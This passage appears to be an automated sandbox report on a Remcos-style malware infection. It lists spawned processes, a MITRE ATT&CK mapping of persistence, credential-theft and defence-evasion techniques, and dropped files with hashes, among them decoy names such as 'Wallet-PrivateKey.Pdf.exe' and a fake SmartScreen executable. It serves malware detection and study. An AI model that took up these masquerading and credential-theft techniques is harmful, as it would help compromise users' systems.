        System Location Discovery: System Language Discovery
        
        PID:544

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-887035471-6573071781093122018-5219835501910751559264275529-20426618851646398835"
1⤵
PID:2284

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "153973666921275995979528176921569510821-1031311966543849358-15361348011302167483"
1⤵
PID:3056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19536649862053906741-1424106330-1536639647570314771386280432529869877-1895095244"
1⤵
PID:2644

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1497303018-748278535-11192728462439914143812888642109123750-1337623706-1318465313"
1⤵
PID:2492

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1209929925-91706136-1604928154-1031455269-887142040-4804169411200993412-1286129404"
1⤵
PID:288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4275122421875071538656342290-689000978-376325743-1038419786-1979760254-263616050"
1⤵
PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
761KB

MD5
c6040234ee8eaedbe618632818c3b1b3

SHA1
68115f8c3394c782aa6ba663ac78695d2b80bf75

SHA256
bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

SHA512
a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

Download Submit
C:\ProgramData\System.exe

Filesize
35KB

MD5
c95261eab6c76d4e65624919ccb13cd7

SHA1
9daad5cc07c35f96061ffec077454c99508f2532

SHA256
6a8a6457a46f87a5d42d578b4807bee42305920cbf1bfb0402d8f3ae0c91ae30

SHA512
92acd72ccee4ed8d7f66abb2e1b0520f76310d13634578aa46ce28229316ecbd6603bc6b9febe0fa91852c589f043fc3870229a921ac27020feb79f6b0dc4417

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
248B

MD5
8fa41bacf55b6c4860b1592d05761d90

SHA1
be2061f9519a7acd0fefa37cbeb84ad31624772a

SHA256
501e7fc65bba9dff0692f04334c58cd7ab8905a56390b5c392ad843233c0e446

SHA512
458b1c89e647d27a6582ee3644c90b7dab34f5257edcb7b5136366cdde533916346dda2a5ca8668e99838527787d8181e30a7e79d7e93b97a5f1560d3778d28c

Download Submit
C:\ProgramData\rostad\logs.dat

Filesize
248B

MD5
57494afa486d42b5625a76a5457db3da

SHA1
0c7f143a2ce19acc6c5917d726bb64246585e6ef

SHA256
51b2e87ca293a6e23dcd902f4e5fec08241a67fc8c3a54980bee32cacdf1862b

SHA512
cad8599d3b86994d9d83021793fac58142618cd483e09e823f216d30f83941b83224200cd550cc370eebf4082e91884c38578b95732cc77cd331ecb794522dd1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

Filesize
1KB

MD5
55540a230bdab55187a841cfe1aa1545

SHA1
363e4734f757bdeb89868efe94907774a327695e

SHA256
d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

SHA512
c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F59A01A8B782D93EA6991BC172CEFFB1

Filesize
867B

MD5
c5dfb849ca051355ee2dba1ac33eb028

SHA1
d69b561148f01c77c54578c10926df5b856976ad

SHA256
cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b

SHA512
88289cdd2c2dd1f5f4c13ab2cf9bc601fc634b5945309bedf9fc5b96bf21697b4cd6da2f383497825e02272816befbac4f44955282ffbbd4dd0ddc52281082da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

Filesize
230B

MD5
ddff96cbcfe8425ecf0ba51397366cd6

SHA1
7fd41b0167ab16c4b9ab74eb2e251813171bbf39

SHA256
fb6abc689be8608a4aeab8ba9986f19bf25171e974791632281487509859a8ae

SHA512
6e6199b90eb1b4464a07af5d2c0026d4d2508eacd87e545cb91ff04dfe90a291aecfa54a72f32c0597104ca056e4145509cf35af704735682d7f334441fe58c5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

Filesize
230B

MD5
5a02aab72e1396ae52c1c6dc3e47314b

SHA1
4d92f339e6c179ba7e73eaa2412b541f8e0a3289

SHA256
7cc30e2139e03990bd0cbf4e1f860239dafd842ae7e1c42640a89441daab0ac9

SHA512
6924a243970600c3bf44b73182fe6a6f7d69a4eabe31b0af35663932ebd46f7e5f56a22d455b5a8f195a4e8f5d2d46e91980b613063262b4cf715fcde44fc2b2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cf22391f48c539b5cb950077232643e0

SHA1
f71a7a039ed4ae790b84d12f3047d3a9b274680e

SHA256
b93e2f705782c16e1ea825f7d50d9176b438b57288e210d3b4161c9c65342000

SHA512
9d068d74eba9c9098589f6e1bdd1315b83f356e1292d2220c114767935f8303a85e1028db64aeeecc88f45ff1134a7c77ac71bfd9f15d9f3d7662194796b2e33

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
902cf375517c549394911661f3fcc4bd

SHA1
1167af9315aeac2df1eb81b483956d781f7bbfc5

SHA256
3510b42b99e488f61b85b530355f037f2e0a6ef35c97cddcf035e64b1b4ad863

SHA512
b1b34403574b333edff7ef13252f2aca14825fe330159fdac11dfacf83aa6811c579fd0d27214e7f650647fe4b9c7d214e72482576d70befb135a28b4a268cf4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4f92b3aa617c3f5ac00cc5dd3026976c

SHA1
27d912335602bc9284cf997399782f11561cd368

SHA256
5c5f6598f98e870cef59e90533ab1323c082570e05d340b09b1dd7818b74c61e

SHA512
523ccbf4bb728a929f4733255f03b03386eaf6eb53a2b982fc90aab881792573691d04a3dd48142ddb12a61dd3c48f71cae6aacba21f274960affa6f432c428c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5a24b7fd993c0459ef13e4bda3b0fa10

SHA1
304d47afb76516ea907599b57cb5cfa8d28f20ef

SHA256
9f345b412e78b516d48e8bf568481ca577e9603a135c5f671bd4c69aa4313c97

SHA512
a19985c2f6dee730f497f0af4a2c414ef567f4389d1cb949dc0c4707c5256de0dd69d1d1ffc651a6c1c537a43e23d5ad6f12b62194bf504fc805dc599caf7baa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
088066fd4bbddf98a0a5e87efbbcf368

SHA1
fd55bf2b621a06313ce125faf890ccb8093ef56e

SHA256
a5ac56bb34e330e6b46ccb2bd6270a7a36e5999a32f074ecbedf468f04a06bde

SHA512
9abc864af1bb114355f810581241d254f61938680b16b4d0bd17018fe334bf6fb87e7fd7342275cdc92c24175e6e8b9f8a6fe45bfabb0dbcf77c03daf9c95b10

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
18e7400552a8bc93a91bbea763d4a53d

SHA1
46c80c156c3b64b09631a59efc8629708732e523

SHA256
1d94a0b630e7c0929ce4fe6c519db71f7eeef4d4ab7d4e497a9dbd810ac2cee5

SHA512
6cf1161a6572661dec188af4aab1df236ab81ee0273eccd9065e3c6e2d15907ec1d8bca2acce9365d93356dee07b8e547ecdc40f03a0de1aa30d04eb604fdfaf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dddbaf9ccbef8c0d2422271e5e07e3a8

SHA1
c1d9fc5e07a9a59e3403426a547c9c681501f7e4

SHA256
b6e6caef26cf8e35d3437c7ccc3f9d4b4d6c8566210a9879dc0b633098fa7527

SHA512
d5a9dbe01e315586f8783d98252e5f0922bd6729543b7312a50f816906c6628f10f24f3ca23ec7bf123cdd6a96e151a2a2998ba4df955598ae4dfcf150840a18

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3370a4cc861f09c1ce07cb9015275918

SHA1
cffd65ec7c9165864f85e00d4760481633d7917b

SHA256
898e40822cbc40521f821d8f102b414b64dc80fa256d02d81844f11b769833d3

SHA512
7a39c520f036a5e626232d6b86a66be4c8a9a7eefe690cbd1f921ef3d8c045e5181ebc78cf15de3b2c5b9a033bd20458db5100147cbc7e7f3d53515629c09769

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ef69d4867d0e1d06f6b86da0bc345ae8

SHA1
dfea29bcb3ea5a26d799aaddc888278b03223d10

SHA256
4bffad94608462692624897e9586bf5001da087a7530e1dfa5fea2695f8d1791

SHA512
4460f44335dbd0fb4f04e59c999d9cd92fdfb559f9451be5a91b438363182988e8856bf8c95210957597dcc0d763ec810c4d1d5f0b9b168d4b864c14acb2f1c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2cae108aefd11681cde61e1b2d20ebc3

SHA1
88a646fe63b2b9a3a1ffaaf40b522f50c266df02

SHA256
cfc83e914aa78f4c359db98242b35bba3bc38955befa5b3f4097dbe895d00334

SHA512
0633f55d10463c2c0892330c72cdb193a490088f4e86b40eea170005c40db00a2b81e4fb088273e8b01a93a3f85f4fc63b5984a869b0bd08e4706277c86a4cd2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
859bbb759245d7c23b71862ecfc9b258

SHA1
469d996a2a98db3a5cb86269cdf5dbd403dceeeb

SHA256
d2011ce0dfbad11e7a5b4d870caa5d5342eb28486e6e44c4632b27e9a613ca04

SHA512
fa35b03dd9e2d0bb112e21a7819ca60d784ed50da42cf3de790af042bfd212a81a820fff345fc7c659983b10761bde277c379cefae4450635a0f34c68221a606

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1

Filesize
242B

MD5
8574a3d09e568c625bb358509fd1e23e

SHA1
715f6b6e37a8cbbf323baaa510ab77386959babf

SHA256
e878d71cb50b00c48b5e88ad65b0efb58608f38d1beb5833e1d7fa03bd86bd53

SHA512
e20d89fb8a69e7f1200ced18cd9bee794cceef6e9ebbbf4620325330982c0ccba7d38d0b29bfb005ad60b9c9f48c3c344af6e74d96ec11bccca222adf2cd7bb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe

Filesize
8KB

MD5
69994ff2f00eeca9335ccd502198e05b

SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead

SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabADAE.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\REfc8nfK.xlsm

Filesize
24KB

MD5
68cfed3ef415ced541793b56c304928c

SHA1
46ab5bd18e688ead7e172b60ae1323ae5953c41f

SHA256
14168a8b56084b0c54e2d4688bb09e32a036a4d8e36889cf8de79e051c9cba5d

SHA512
bd57224dcb93e4ec10653cea54b8eaa92eaff4171e21fe9af25a01b70ff2854c2a9adbf0e9c2f0aaae2125dfa370b003e96d98c778e31061d920df1f8b7addd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\REfc8nfK.xlsm

Filesize
17KB

MD5
e566fc53051035e1e6fd0ed1823de0f9

SHA1
00bc96c48b98676ecd67e81a6f1d7754e4156044

SHA256
8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

SHA512
a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\REfc8nfK.xlsm

Filesize
29KB

MD5
97f51a45d227f22e60de0cca5bc8fe9d

SHA1
6a962e04e634714ba1d63b371ac9b3dafe66f8a9

SHA256
57f711c2cd4140551247d29389d8019f2fd89a73408834f5877b672684ac78d0

SHA512
fd14a03957b65e572d57a3acee24deec3d39d36a6ad7c63f02d4ffa22af21ea1c29b048b5d8e060cb4e0eec47ecd4a9c2191ebbb8fb683e13003f5d0e7a80026

Download Submit
C:\Users\Admin\AppData\Local\Temp\REfc8nfK.xlsm

Filesize
28KB

MD5
2e0f607d99d435a752efd68b9f39ee44

SHA1
297079c812b8d862c15432d3ace4fc9f975e521a

SHA256
b7cbbccecc3194317e43acc3c51bef5807734fd76adee406445016dfe38d907a

SHA512
f6b27ad4ccf8c75e8ab02ca32b7cc4c7b03c3417c5902ab5fe1784b0401566859b862f7175af5a845ba4e2ca9d6bd177bc1d89c8378fc6737364fa211fbb2c09

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarAE0E.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe

Filesize
3.5MB

MD5
6626a89aa5cc47a20e9de81360327a3e

SHA1
c50e1f4cd7dc8cc23a3b73e0fb49464bbb6f2511

SHA256
f9c6e2f4c1be741b973d13b711fe68c71a2245c9908d0345724805f5eff1e2e7

SHA512
c3f2d9b5e7ddc03e8d1318f3a0faecf9e60938650203acf17032c3685ddb084e5d209e1f89d09886cc72eff9103ab907949df409a28504817453c85f9d28d170

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe

Filesize
3.1MB

MD5
21ce4cd2ce246c86222b57b93cdc92bd

SHA1
9dc24ad846b2d9db64e5bbea1977e23bb185d224

SHA256
273c917fc8fddcb94de25686720df1ea12f948dfbebffa56314b6565123ae678

SHA512
ff43fe890e30d6766f51922cfd1e9c36d312fd305620954fae8c61829f58d7361ae442bf9145339904eb6a88c2629c1e83f5b8a1d78ab0d13554cf6053d194f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe

Filesize
526KB

MD5
3947cf0ed023919bd463207a59aab84c

SHA1
5ccbf9b782441a5e610888bad4219b22988b2173

SHA256
3b4341374f5db8e0892cfb0e4991a003c1aee88dccfe68bd8b987552b8d594eb

SHA512
ef7598b40c6c3e205a9f1645b101619d09ecbb76df9918199ac52a480627b11a7d793e25da793d867f727032f4573fb187cdfa8db128c3b15f5e14c49426d5f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\NewApp.exe

Filesize
12KB

MD5
5d8ca7142f17073e44a042e5988fce1a

SHA1
d2a700dfbf8d15c535d7198c4285e48419ab91d1

SHA256
ccbca6daf4e4d71d6d05c7563cbf37de2415b0beccac2405a2bba35fef9d2ae1

SHA512
b2814b60f3e4f87daa7669ab13ed1e108ab1c49a5abb57180aa1952f0f15409a22bdab366eba4783897c8ea3eb46a287b063d88d85225f046212756a912342a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe

Filesize
73KB

MD5
9d347d5ac998a89f78ba00e74b951f55

SHA1
73df3d5c8388a4d6693cbb24f719dba8833c9157

SHA256
2ea5686422bd8fb6eda542e9a96588f9deb1c97c45f3cb7d3b21ac4da540b57c

SHA512
3db7421aa98e8e108bf982048dda7e0f09428c6498cf5f9f56ef499fb2fafc5deabde8ecb99e1fdd570d54ae9c0533b7502de5848c9e772708cf75509d0c9d9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Updater.exe

Filesize
12KB

MD5
8e3dd64a48207e0bed01c927f1335516

SHA1
c6b7dd487b8f8f0d9c6548da7c2ff6492727f192

SHA256
57015f166979bb55f694bf27e612d96c6cd630337ca692eab4392f30a4b3ee2a

SHA512
d44625fe9390e045197331a4ba2b1dcd8e52d95615368cb9ef382ae1911393059cde274887f999dab2799a449b4dcdf481e106a664230d5e2bdbaef37f1e1fb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe

Filesize
107KB

MD5
036ba72c9c4cf36bda1dc440d537af3c

SHA1
3c10ef9932ffc206a586fe5768879bf078e9ebeb

SHA256
bb41ae95f911a55ab1101ca7854918ec0f23548376d4846a2176b9c289102114

SHA512
c7e8c37787b759bca7fb6d02692c0263d6c60f606ee52e890f3c177dabd00ac6305cd43056164f6e16fbc18046a8c4226172f295ebc85e310ea7e52878d5137d

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe

Filesize
72KB

MD5
0076324b407d0783137badc7600327a1

SHA1
29e6cb1f18a43b8e293539d50272898a8befa341

SHA256
55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583

SHA512
96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\fuck.exe

Filesize
481KB

MD5
7163fe5f3a7bcfdeec9a07137838012a

SHA1
3bd90557615ef95e4244bdbaa8e0e7fd949cdd3a

SHA256
5433726d3912a95552d16b72366eae777f5f34587e1bdaa0c518c5fcbc3d8506

SHA512
ea6d91205ed0d53868f44077e1d6db3bf8d6e3607378be22e643df3777120aa36d53e39748e4220dbf1d3355a0b791b9a3e5ddc080018d169c81d7ce0afb6478

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe

Filesize
507KB

MD5
4e7b96fe3160ff171e8e334c66c3205c

SHA1
ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f

SHA256
e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c

SHA512
2e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe

Filesize
481KB

MD5
50dd6e5820551b0f7dd7f8b627595213

SHA1
05d3291e0ae3774b52c2b0cd3e402c71c635d003

SHA256
be92e9c26ecf8e58ed7bac040283aa784cd89bcabb66d583c7a8a916a12dccb5

SHA512
a40bfa8ac20af5e959bb804c9de22453a20c818a3e05fff8345510fe8e97eebb941b53500aa0189b248b492e06155e9bc82950ce74db168656bc6924babe58a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\elZ1MCgHu2iD.bat

Filesize
219B

MD5
a0d5cd3097d2c5c9dc41e96fe59dba5b

SHA1
bbdab61caa7ae298fb47d03b14638d2d2704f26e

SHA256
dc445f7677b81bdce8f89eefa44eb83f6d71bf23921ace6a0c8f08ef5f4cda7b

SHA512
11e1daf1bfbaa91fa33930497a46ca54561d8088bb73773b6d296abe7d804c2316444f74f4b35578a17e0f989b9ceba9bb2830ef5af3e76da8e8352de0f9670c

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcqKihuYfvij.bat

Filesize
219B

MD5
561ac57317b9b60baa2d56714912ee76

SHA1
1f56aba3803a849e0023a8d6cf596180aaabbc1b

SHA256
141486aff8401784a23af9447370fa4c95dccebb82ca14772d1f80ce20e1e8ed

SHA512
496396c665c2ffae9bde974303a084c43218e994af0293cb40f3657eafa4f71d4f20aff7c997d763db3b101f65898a0b86f8318084e0a0c1a0c78f957184bcfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\j5McJZwHvKNz.bat

Filesize
219B

MD5
27ab4e06636fa0e83b9ba28a1cc5b428

SHA1
ed236afa1237dac6a31133781697c59d50e6e7ac

SHA256
631d9d588dabbeb7a2cab26812ec3e2588327b02ca5cc23b976d122844258cf2

SHA512
1942f0c7b9f1f370fad926fb006ebf92628e47c7f9c2edbefe5ec88ed253b510494b83e728e3c42e5cf404ef068584c9f5158b733778a9f731ff7f76e511c6f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\jLJvAYyQnAlQ.bat

Filesize
219B

MD5
5e21be80da922b26e6b376159976e9cf

SHA1
32e8926aa6fe1a137db9a6d3ad8738c7c7dfc01c

SHA256
769f258396b541f5955e9215e8f5da9e58db74ac4bf4e85c079d3867e5ce692f

SHA512
f6b8b5b7df80299e46f8cac12cb9927004a4c392d63c42b7677577f8851f2e45ac8da5fef0432970e829d2323e34f8ff8b53385393c5c87ef2c20aeb9ef3aec1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
dafe2772bd1d0431fb6b4de9fe620228

SHA1
0462f5b26c78430ddf006619a7560bf1549f7293

SHA256
1c5d23efa2bc42138e88e8ba8474de540f3f93ced922431f6fbad16bafcc9e08

SHA512
9e5afdeb5f984a422ac9e46d1b3abe8b311f40f2d442727af43eb24588303f38b2bda96e1c94cbd501cff4d3b5d9a24d6cd7c7df416d74f3852dfcce47ec7ead

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe

Filesize
3.1MB

MD5
ff8c68c60f122eb7f8473106d4bcf26c

SHA1
0efa03e7412e7e15868c93604372d2b2e6b80662

SHA256
5ff2becf2c56500cb71898f661c863e647a96af33db38d84d7921dc7dbf4f642

SHA512
ab92ef844a015c3fcbfba313872b922bff54184b25623ed34f4829bd66a95af081cdeefd35425a4d3b9d9085ccf8c25045cf6093d74a5c8c35012c1b7546688e

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
3e9af076957c5b2f9c9ce5ec994bea05

SHA1
a8c7326f6bceffaeed1c2bb8d7165e56497965fe

SHA256
e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

SHA512
933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

Download Submit
\Users\Admin\AppData\Local\Temp\a\yuksefyj.exe

Filesize
5.2MB

MD5
6f163d9cd94d4a58ad722301cf9847d0

SHA1
ffcf6d1a5956dfb60a0fd7267039e30fbe2fd981

SHA256
827642649f28e190ac328f026c6c1a332d45b2be4af76bd8f6c8e85838c90b11

SHA512
5503fefd77a87f8030dbd468168abeb3b778857bd770720942f3f1b41cf498f79a3f9138bb1cb7b24b52f55d67724de31aeb42225ee21c8712719323d45e7d67

Download Submit
memory/544-834-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/544-838-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/544-837-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/544-830-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/544-828-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/544-832-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/544-826-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/544-839-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/620-756-0x00000000000E0000-0x00000000000EE000-memory.dmp

Filesize
56KB

Download
memory/692-611-0x00000000001C0000-0x0000000000240000-memory.dmp

Filesize
512KB

Download
memory/692-613-0x00000000001C0000-0x0000000000240000-memory.dmp

Filesize
512KB

Download
memory/692-610-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/796-852-0x00000000014F0000-0x000000000151A000-memory.dmp

Filesize
168KB

Download
memory/796-853-0x0000000077210000-0x00000000773B9000-memory.dmp

Filesize
1.7MB

Download
memory/796-851-0x0000000000EA0000-0x0000000000EA8000-memory.dmp

Filesize
32KB

Download
memory/796-849-0x0000000019F40000-0x000000001A222000-memory.dmp

Filesize
2.9MB

Download
memory/796-854-0x00000000770F0000-0x000000007720F000-memory.dmp

Filesize
1.1MB

Download
memory/828-603-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-598-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-601-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-602-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-593-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-600-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/828-616-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-617-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-599-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-604-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-605-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-597-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-594-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-596-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/828-595-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1268-861-0x0000000077210000-0x00000000773B9000-memory.dmp

Filesize
1.7MB

Download
memory/1268-858-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1268-862-0x00000000770F0000-0x000000007720F000-memory.dmp

Filesize
1.1MB

Download
memory/1268-856-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1268-857-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1268-855-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1268-860-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1268-863-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1280-703-0x0000000001000000-0x0000000001324000-memory.dmp

Filesize
3.1MB

Download
memory/1320-779-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/1320-780-0x0000000002780000-0x0000000002788000-memory.dmp

Filesize
32KB

Download
memory/1332-569-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/1332-570-0x0000000001CE0000-0x0000000001CE8000-memory.dmp

Filesize
32KB

Download
memory/1504-563-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1504-496-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
